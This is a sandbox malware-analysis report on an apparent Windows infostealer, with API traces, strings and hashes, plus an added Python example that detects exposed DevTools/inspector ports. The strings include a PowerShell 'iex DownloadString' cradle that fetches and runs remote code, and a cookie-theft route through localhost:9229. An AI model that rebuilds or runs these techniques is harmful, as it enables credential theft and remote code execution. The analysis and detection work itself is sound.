                                • Opcode Fuzzy Hash: 737ed1dee8cb70a684bcd24652b427280c03084737728c1510d0dd40fd27a9ed
                                • Instruction Fuzzy Hash: 46B17CB0A116279BCB22FBA9DC48AEFB7B7BF41300F040529E81597661EB34DD41CB95
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,006B72A4), ref: 006C47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 006C47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006C480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006C481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 006C482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006C4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 006C4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 006C4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006C4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006C4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 006C4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 9829800eca607cf3831e2858afb8b1a3bee7827cfcd5fc7f4e5b2646ef043f61
                                • Instruction ID: 9e41376a9c04b458cc72835faac27f65510123e4ec45e7e67291944c692fd3e6
                                • Opcode Fuzzy Hash: 9829800eca607cf3831e2858afb8b1a3bee7827cfcd5fc7f4e5b2646ef043f61
                                • Instruction Fuzzy Hash: FC114771D53B21FBC711AFB5BC0DA563BB9BA097063054B1BF592E6660EAF44800DF60
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BBE53
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006BBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006BBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BBEEB
                                • lstrlen.KERNEL32(')"), ref: 006BBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 006BBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006BBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006BBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 006BC00C
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 02bd3573dcc161ed11f8f4ebc1c9b1e791f1c6a0c93ac7adc2adff29134ee86f
                                • Instruction ID: 6d0c9efc1f96d96345b4a96042a74338322aace9766d47cac309d4e6911dabb5
                                • Opcode Fuzzy Hash: 02bd3573dcc161ed11f8f4ebc1c9b1e791f1c6a0c93ac7adc2adff29134ee86f
                                • Instruction Fuzzy Hash: 8F6190B0A11216ABCB21BFB99C596EE7BAABF05300F04146DF509D3221DB74CD428F94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C184F
                                • lstrlen.KERNEL32(01326C00), ref: 006C1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18C1
                                • lstrlen.KERNEL32(006D4FA0), ref: 006C18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18F4
                                • lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C192F
                                • lstrlen.KERNEL32(01326C20), ref: 006C1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19A6
                                • lstrlen.KERNEL32(006D4FA0), ref: 006C19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19D9
                                • lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A14
                                • lstrlen.KERNEL32(01326C40), ref: 006C1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A8B
                                • lstrlen.KERNEL32(01326C60), ref: 006C1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1B02
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: a8cb3378941f606b2b024126f619f9925b0e90dd6171c98a6d962a8a2723e4f8
                                • Instruction ID: 7e43afe11de090aa492da76c944203e0f852403214343dd09d629d8bda4678c8
                                • Opcode Fuzzy Hash: a8cb3378941f606b2b024126f619f9925b0e90dd6171c98a6d962a8a2723e4f8
                                • Instruction Fuzzy Hash: ED911FB16017039BDB20AFBADC98E6AB7EAFF06300B14452DE986C7752DB34DC418B50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006B47C5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4812
                                • lstrlen.KERNEL32(006D4B60), ref: 006B481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B483A
                                • lstrcat.KERNEL32(00000000,006D4B60), ref: 006B4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 006B48DC
                                • lstrlen.KERNEL32(?), ref: 006B48F0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A5D
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 31c8318e3719c932750f03349efd8751c202d4fbaefb2b0ed4fd3ecac07af31c
                                • Instruction ID: 7bc3da2b1fc1a8fa57d2466bbebb973caa9382900dadb716ea7a909174032669
                                • Opcode Fuzzy Hash: 31c8318e3719c932750f03349efd8751c202d4fbaefb2b0ed4fd3ecac07af31c
                                • Instruction Fuzzy Hash: 10B19DB1A512169BCB21FF69D895AEE77BBAF41700F04412CF94AA7712DF30EC418B94
                                APIs
                                  • Part of subcall function 006A90C0: InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A90DF
                                  • Part of subcall function 006A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006A90FC
                                  • Part of subcall function 006A90C0: InternetCloseHandle.WININET(00000000), ref: 006A9109
                                • strlen.MSVCRT ref: 006A92E1
                                • strlen.MSVCRT ref: 006A92FA
                                  • Part of subcall function 006A8980: std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                • strlen.MSVCRT ref: 006A9399
                                • strlen.MSVCRT ref: 006A93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 006A9547
                                • lstrcat.KERNEL32(?,006D1794), ref: 006A9559
                                • lstrcat.KERNEL32(?,?), ref: 006A956A
                                • lstrcat.KERNEL32(?,006D4B98), ref: 006A957C
                                • lstrcat.KERNEL32(?,?), ref: 006A958D
                                • lstrcat.KERNEL32(?,.txt), ref: 006A959F
                                • lstrlen.KERNEL32(?), ref: 006A95B6
                                • lstrlen.KERNEL32(?), ref: 006A95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A9614
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 14c16a32bf185637c8feeea258b2cc49dac3d830bd365dd1a0c45c00140b87f4
                                • Instruction ID: b966bfa9cac316f62b92dfe36b38b560428e7a35207faeb5d3898572cf1aba0b
                                • Opcode Fuzzy Hash: 14c16a32bf185637c8feeea258b2cc49dac3d830bd365dd1a0c45c00140b87f4
                                • Instruction Fuzzy Hash: DBE12A71E10219DBDF50EFA8D891ADDBBB6BF49300F2044AAE509A7251EB309E45CF94
                                APIs
                                • memset.MSVCRT ref: 006BD9A1
                                • memset.MSVCRT ref: 006BD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 006BDA1C
                                • lstrcat.KERNEL32(?,0133ED88), ref: 006BDA36
                                • lstrcat.KERNEL32(?,?), ref: 006BDA4A
                                • lstrcat.KERNEL32(?,0133D708), ref: 006BDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BDA95
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BDAFE
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 477593acb4b76ffebbbf8f3c70e34377ca2f88f8364a8be9fac5d73c4aca8cb4
                                • Instruction ID: 5efe0b214a2a256acacf7a0cf5d007ea30a725842c4bfc097640c5270bb02ce1
                                • Opcode Fuzzy Hash: 477593acb4b76ffebbbf8f3c70e34377ca2f88f8364a8be9fac5d73c4aca8cb4
                                • Instruction Fuzzy Hash: 59B19FB1910259AFDB10FF64DC949EEB7BAFF48300F144569E94AA7250EB309E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB3D9
                                • lstrlen.KERNEL32(006D4C50), ref: 006AB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB474
                                • lstrcat.KERNEL32(00000000,006D4C50), ref: 006AB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB4A9
                                • lstrlen.KERNEL32(00000000), ref: 006AB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB587
                                • lstrlen.KERNEL32(006D4AD4), ref: 006AB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB622
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006AB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB65E
                                • lstrlen.KERNEL32(?), ref: 006AB767
                                • lstrlen.KERNEL32(?), ref: 006AB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB79E
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 099da6d0cd8152ec434837429e7ae8bf8eeace29d1f17925df89130a062ac053
                                • Instruction ID: 3e1e26f1a2e4be2714bfc0fbf55ed01a088858516cf49c9ef4d590dbfe0a2e6e
                                • Opcode Fuzzy Hash: 099da6d0cd8152ec434837429e7ae8bf8eeace29d1f17925df89130a062ac053
                                • Instruction Fuzzy Hash: 87024170A01216CFCB25EF69D958AAAB7F2BF46304F18916DE4099B362D775DC42CF80
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • RegOpenKeyExA.ADVAPI32(?,01338B28,00000000,00020019,?), ref: 006C37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006C37F7
                                • wsprintfA.USER32 ref: 006C3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006C3840
                                • RegCloseKey.ADVAPI32(?), ref: 006C384E
                                • RegCloseKey.ADVAPI32(?), ref: 006C3858
                                • RegQueryValueExA.ADVAPI32(?,0133E890,00000000,000F003F,?,?), ref: 006C38A1
                                • lstrlen.KERNEL32(?), ref: 006C38B6
                                • RegQueryValueExA.ADVAPI32(?,0133EA28,00000000,000F003F,?,00000400), ref: 006C3927
                                • RegCloseKey.ADVAPI32(?), ref: 006C3972
                                • RegCloseKey.ADVAPI32(?), ref: 006C3989
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 4f518c1cf00e009b8d185adce76863798034e33cdd08d6057e60bf6e98879e00
                                • Instruction ID: faf2e9a4d7ca0cf188fe85018dd612eaffb3c320b153c87ec064743cc8c57e59
                                • Opcode Fuzzy Hash: 4f518c1cf00e009b8d185adce76863798034e33cdd08d6057e60bf6e98879e00
                                • Instruction Fuzzy Hash: 43914AB29012199FCB10DFA4D984EEEB7BAFB48310F14856EE509A7351DB31AE45CF90
                                APIs
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006A90FC
                                • InternetCloseHandle.WININET(00000000), ref: 006A9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 006A9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006A9197
                                • InternetCloseHandle.WININET(00000000), ref: 006A91A2
                                • InternetCloseHandle.WININET(00000000), ref: 006A91A9
                                • strlen.MSVCRT ref: 006A91BA
                                • strlen.MSVCRT ref: 006A91ED
                                • strlen.MSVCRT ref: 006A922E
                                • strlen.MSVCRT ref: 006A924C
                                  • Part of subcall function 006A8980: std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 2127bfe01dcf84c382b5705689e6c03a1d98bcfcc4d09100ec9355ca2d776311
                                • Instruction ID: e1fc41883faff6a5f45b3b310a85d55561e3b6a5d1c3ade0bff7b84ba27033cc
                                • Opcode Fuzzy Hash: 2127bfe01dcf84c382b5705689e6c03a1d98bcfcc4d09100ec9355ca2d776311
                                • Instruction Fuzzy Hash: 19518071A50205ABD720DBA8DC45FEEB7BAEF48710F14016EF505E3280DBB4EE448BA5
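The function at 006A90DF above requests http://localhost:9229/json and then scans the reply for the literals "webSocketDebuggerUrl": and "ws:// that appear in its string table. /json is the discovery endpoint of the Chrome DevTools Protocol (the Node.js inspector serves the same endpoint, and 9229 is its default port): every target it lists carries a webSocketDebuggerUrl, and a client that connects to it can drive the debuggee over CDP. The following is an added example, not code from the report or from the sample: it shows what such a reply looks like (the reply is constructed, its target id and page URL are invented), reproduces the sample's substring extraction next to a proper JSON parse, and adds the host-side check a responder would want, namely whether a browser or node process on the box was started with the flag that opens such a port.

```python
"""Added example, not from the Joe Sandbox report or the sample: what the
localhost:9229/json request at 006A90DF reveals, and how to check a host for
processes that expose a DevTools/inspector port."""
from __future__ import annotations

import json
import re
from typing import Optional

# Constructed reply shaped like a real CDP /json discovery response; the
# target id and page URL are invented for this example.
SAMPLE_JSON_REPLY = b"""[ {
  "description": "",
  "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/ABCDEF0123456789",
  "id": "ABCDEF0123456789",
  "title": "Example",
  "type": "page",
  "url": "https://example.invalid/",
  "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/ABCDEF0123456789"
} ]"""


def extract_ws_urls_naive(body: bytes) -> list[str]:
    """Mimic the sample: locate '"webSocketDebuggerUrl":', then the next
    '"ws://', and copy up to the closing quote. No JSON parser is involved,
    so it also "works" on truncated or malformed replies."""
    marker = b'"webSocketDebuggerUrl":'
    urls: list[str] = []
    pos = 0
    while True:
        pos = body.find(marker, pos)
        if pos < 0:
            break
        start = body.find(b'"ws://', pos + len(marker))
        if start < 0:
            break
        start += 1                      # step past the opening quote
        end = body.find(b'"', start)
        if end < 0:
            break
        urls.append(body[start:end].decode("ascii", "replace"))
        pos = end
    return urls


def extract_ws_urls(body: bytes) -> list[str]:
    """Robust version: parse the discovery reply as JSON and read the field."""
    targets = json.loads(body)
    return [t["webSocketDebuggerUrl"] for t in targets if "webSocketDebuggerUrl" in t]


# Chrome/Chromium: --remote-debugging-port=PORT ; Node: --inspect[-brk][=[host:]port]
_DEBUG_FLAG = re.compile(
    r"--(remote-debugging-port|inspect(?:-brk)?)(?:=(?:\S*?:)?(\d+))?(?=\s|$)", re.I)


def debug_port_exposed(cmdline: str) -> Optional[int]:
    """Return the debugging port a process command line opens, or None.
    A browser or node process started this way is exactly what a probe of
    localhost:<port>/json is looking for."""
    m = _DEBUG_FLAG.search(cmdline)
    if not m:
        return None
    if m.group(2):
        return int(m.group(2))
    # --inspect without an explicit port listens on the Node default, 9229.
    return 9229 if m.group(1).lower().startswith("inspect") else None


if __name__ == "__main__":
    print(extract_ws_urls_naive(SAMPLE_JSON_REPLY))
    print(extract_ws_urls(SAMPLE_JSON_REPLY))
    print(debug_port_exposed("node --inspect=127.0.0.1:9230 app.js"))
```

The naive extractor is what the strlen calls after InternetReadFile are consistent with; the JSON version is what a defender's tooling should use. On a live host, feed debug_port_exposed() the command lines of running chrome.exe, msedge.exe and node.exe processes; any hit is a process the request at 006A90FC could have talked to.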
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006C16A1
                                • lstrcpy.KERNEL32(00000000,0132A7B0), ref: 006C16CC
                                • lstrlen.KERNEL32(?), ref: 006C16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C172A
                                • lstrlen.KERNEL32(0133E6E8), ref: 006C173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1762
                                • lstrcat.KERNEL32(00000000,0133E6E8), ref: 006C176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1792
                                • ShellExecuteEx.SHELL32(?), ref: 006C17CD
                                • ExitProcess.KERNEL32 ref: 006C1803
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 0d8aea01420cc48cddb0b13d6f56cb7e2ec98057113124772382864e01d85b1a
                                • Instruction ID: a20ad92ae7fee2318585cc378eae3b4fa66fb6b5fa7c213fd622ce4f2e3f3e68
                                • Opcode Fuzzy Hash: 0d8aea01420cc48cddb0b13d6f56cb7e2ec98057113124772382864e01d85b1a
                                • Instruction Fuzzy Hash: B651747090261AEBDB11EFA5DC94AEEB7FAFF46300F14416AE505E7351DB30AE018B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006BF026
                                • lstrlen.KERNEL32(00000000), ref: 006BF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 006BF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 006BF081
                                • lstrlen.KERNEL32(?), ref: 006BF094
                                • lstrlen.KERNEL32(00000000), ref: 006BF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BF13F
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 520f75cc134b11ec454be87ee2a95cf39acb5d6a73be8e4295abaca290336f65
                                • Instruction ID: 51159b8b01766cfa6f475c0f59641bd9d00b815c80064411f4492b89a66e1e50
                                • Opcode Fuzzy Hash: 520f75cc134b11ec454be87ee2a95cf39acb5d6a73be8e4295abaca290336f65
                                • Instruction Fuzzy Hash: 1551D0B1A511169FCB21BF3DDC59AEE77A7AF41300F09456DF84A9B322EA30DC418B90
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(013390E8,008D9BD8,0000FFFF), ref: 006AA026
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AA053
                                • lstrlen.KERNEL32(008D9BD8), ref: 006AA060
                                • lstrcpy.KERNEL32(00000000,008D9BD8), ref: 006AA08A
                                • lstrlen.KERNEL32(006D4C4C), ref: 006AA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA0B2
                                • lstrcat.KERNEL32(00000000,006D4C4C), ref: 006AA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA114
                                • SetEnvironmentVariableA.KERNEL32(013390E8,00000000), ref: 006AA12F
                                • LoadLibraryA.KERNEL32(013261B8), ref: 006AA143
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 4b8b55200d6106397ec1ec1d5d066dc62a42ca8d858a9d048c9dd01589b78189
                                • Instruction ID: 9411c245ed4a21068278331abc7224e1ba18b050ebe4d6e6bac075a44cb80095
                                • Opcode Fuzzy Hash: 4b8b55200d6106397ec1ec1d5d066dc62a42ca8d858a9d048c9dd01589b78189
                                • Instruction Fuzzy Hash: 4291AA30A01A119FD720BFE9DC44AA637A7BB56704F44025EE50587362EFB5DD40CF92
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BC8A2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BC8D1
                                • lstrlen.KERNEL32(00000000), ref: 006BC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BC932
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006BC943
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 81886006ec871a1ad5dd51831dc76cda54442bf6e7fad7e5ef03f629fc35528f
                                • Instruction ID: b50924bcd6adc5111d98c5c725eb2fc98d27464234f180232dc2dcbbef7f9aee
                                • Opcode Fuzzy Hash: 81886006ec871a1ad5dd51831dc76cda54442bf6e7fad7e5ef03f629fc35528f
                                • Instruction Fuzzy Hash: D061B5B1E1121A9BDB10EFB9CC45AEEBBBABF05750F04056EE846E7301D7349E418B90
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006C0CF0), ref: 006C4276
                                • GetDesktopWindow.USER32 ref: 006C4280
                                • GetWindowRect.USER32(00000000,?), ref: 006C428D
                                • SelectObject.GDI32(00000000,00000000), ref: 006C42BF
                                • GetHGlobalFromStream.COMBASE(006C0CF0,?), ref: 006C4336
                                • GlobalLock.KERNEL32(?), ref: 006C4340
                                • GlobalSize.KERNEL32(?), ref: 006C434D
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 1f10000a78d3e54923d23939b57f3a445613d680185afc68651fa485555483b7
                                • Instruction ID: 70bb7eeab5445f78f764ffc4351cf23a910685d41057a8c244081c749639a053
                                • Opcode Fuzzy Hash: 1f10000a78d3e54923d23939b57f3a445613d680185afc68651fa485555483b7
                                • Instruction Fuzzy Hash: DD512175A11209AFDB10EFA5EC49EEEB7B9FF48310F10455AF905E7250DB34AD018B90
                                APIs
                                • lstrcat.KERNEL32(?,0133ED88), ref: 006BE00D
